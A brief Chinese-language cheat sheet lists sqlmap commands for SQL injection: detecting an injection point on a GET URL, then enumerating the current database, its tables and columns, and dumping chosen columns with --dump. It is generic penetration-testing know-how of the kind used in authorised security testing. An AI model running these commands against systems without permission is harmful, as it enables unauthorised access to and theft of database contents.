1、首先判斷是GET 請求還是POST請求
2、GET請求,直接通過URL判斷是否存在注入點
sqlmap -u url
3、查詢出數據庫名稱
sqlmap -u url --current-db
4、查詢出表名
sqlmap -u url -D 數據庫名 --tables
5、查詢字段名
sqlmap -u url -D 數據庫名 -T 表名 --columns
6、進行爆破
sqlmap -u url -D 數據庫名 -T 表名 -C 列名,列名 --dump